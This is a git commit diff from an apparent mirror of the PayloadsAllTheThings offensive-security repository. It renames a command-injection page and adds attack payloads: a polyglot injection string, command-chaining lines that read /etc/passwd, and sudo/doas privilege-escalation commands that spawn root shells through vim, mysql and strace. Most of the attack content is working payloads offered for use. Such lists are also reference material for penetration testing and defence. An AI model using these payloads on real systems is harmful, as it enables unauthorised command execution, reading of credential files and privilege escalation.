mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Command injection renamed + sudo/doas privesc
This commit is contained in:
parent
4db45a263a
commit
e07a654080
@ -1,11 +1,11 @@
|
||||
# Remote Commands Execution
|
||||
# Command Injection
|
||||
|
||||
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
|
||||
|
||||
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
|
||||
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
|
||||
## Exploits
|
||||
|
||||
Normal Commands execution, execute the command and voila :p
|
||||
Normal command, execute the command and voila :p
|
||||
|
||||
```powershell
|
||||
cat /etc/passwd
|
||||
@ -17,7 +17,7 @@ sys:x:3:3:sys:/dev:/bin/sh
|
||||
|
||||
Commands execution by chaining commands
|
||||
|
||||
```powershell
|
||||
```bash
|
||||
original_cmd_by_server; ls
|
||||
original_cmd_by_server && ls
|
||||
original_cmd_by_server | ls
|
||||
@ -26,7 +26,7 @@ original_cmd_by_server || ls Only if the first cmd fail
|
||||
|
||||
Commands execution inside a command
|
||||
|
||||
```powershell
|
||||
```bash
|
||||
original_cmd_by_server `cat /etc/passwd`
|
||||
original_cmd_by_server $(cat /etc/passwd)
|
||||
```
|
||||
@ -167,6 +167,17 @@ Online tools to check for DNS based data exfiltration:
|
||||
- dnsbin.zhack.ca
|
||||
- pingb.in
|
||||
|
||||
## Polyglot command injection
|
||||
|
||||
```bash
|
||||
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||
|
||||
e.g:
|
||||
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
@ -132,8 +132,31 @@ Edit capabilites
|
||||
setcap cap_net_raw+p /bin/ping # add
|
||||
```
|
||||
|
||||
## SUDO
|
||||
|
||||
## GTFOBins
|
||||
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
|
||||
|
||||
```bash
|
||||
$ sudo -l
|
||||
|
||||
User demo may run the following commands on crashlab:
|
||||
(root) NOPASSWD: /usr/bin/vim
|
||||
```
|
||||
|
||||
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
|
||||
|
||||
```bash
|
||||
sudo vim -c '!sh'
|
||||
sudo -u root vim -c '!sh'
|
||||
```
|
||||
|
||||
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
|
||||
|
||||
```bash
|
||||
permit nopass demo as root cmd vim
|
||||
```
|
||||
|
||||
### GTFOBins
|
||||
|
||||
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||
|
||||
@ -143,6 +166,7 @@ The project collects legitimate functions of Unix binaries that can be abused to
|
||||
> sudo mysql -e '\! /bin/sh'
|
||||
> strace -o /dev/null /bin/sh
|
||||
|
||||
|
||||
## Groups
|
||||
|
||||
### Docker
|
||||
|
Loading…
Reference in New Issue
Block a user